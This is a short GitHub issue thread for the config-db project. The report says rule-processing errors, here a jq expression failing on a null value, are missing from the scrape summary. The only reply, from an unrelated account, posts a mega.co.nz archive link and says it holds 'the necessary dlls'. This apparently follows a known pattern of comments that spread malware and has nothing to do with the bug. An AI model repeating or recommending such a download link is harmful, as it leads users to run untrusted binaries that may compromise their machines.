### ISSUE TITLE
Failed to process rule errors are not recored on scrape summary

### ISSUE THREAD

**Issue by moshloop** [flanksource/config-db#974]
e.g. 

Failed to process rule change.change_type == 'diff' && jq('.status.conditions[] | select(.type == "Healthy").message', patch).contains('Health check failed')
: failed to evaluate rule change.change_type == 'diff' && jq('.status.conditions[] | select(.type == "Healthy").message', patch).contains('Health check failed')
: jq execution: cannot iterate over: null

**Comment by websquadpro** [comment]
try this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive
